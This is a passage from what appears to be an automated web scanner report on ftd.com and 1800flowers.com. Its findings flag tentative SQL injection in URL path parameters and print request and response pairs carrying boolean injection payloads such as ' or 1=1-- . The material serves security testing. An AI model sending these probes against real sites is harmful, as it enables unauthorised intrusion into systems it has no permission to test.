<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repea
...[SNIP]...

Request 2

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826























<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top
...[SNIP]...

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21285651'%20or%201%3d1--%20 and 21285651'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35021285651'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:03:44 GMT
X-Varnish: 540322091
Age: 12
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540322091</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35021285651'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:03:44 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:45 GMT
X-Varnish: 750145506
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15879274'%20or%201%3d1--%20 and 15879274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/favicon.ico15879274'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:05:27 GMT
X-Varnish: 869422801
Age: 12
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869422801</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/favicon.ico15879274'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:05:27 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:05:28 GMT
X-Varnish: 1301387315
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       
...[SNIP]...

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 83538669'%20or%201%3d1--%20 and 83538669'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35083538669'%20or%201%3d1--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:04:56 GMT
X-Varnish: 869420999
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869420999</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35083538669'%20or%201%3d2--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:04:56 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:04:57 GMT
X-Varnish: 729980488
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17090585'%20or%201%3d1--%20 and 17090585'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v2011040717090585'%20or%201%3d1--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:47 GMT
X-Varnish: 750156685
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156685</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v2011040717090585'%20or%201%3d2--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:06:47 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:06:48 GMT
X-Varnish: 729987039
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14836871'%20or%201%3d1--%20 and 14836871'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v20110407/ftd.css14836871'%20or%201%3d1--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540338955
Age: 22
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540338955</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v20110407/ftd.css14836871'%20or%201%3d2--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:57 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540340109
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.12. http://www.ftd.com/351 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12984083'%20or%201%3d1--%20 and 12984083'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35112984083'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:08:23 GMT
X-Varnish: 1301397318
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301397318</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35112984083'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:23 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123161
Date: Mon, 09 May 2011 01:08:25 GMT
X-Varnish: 750163468
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

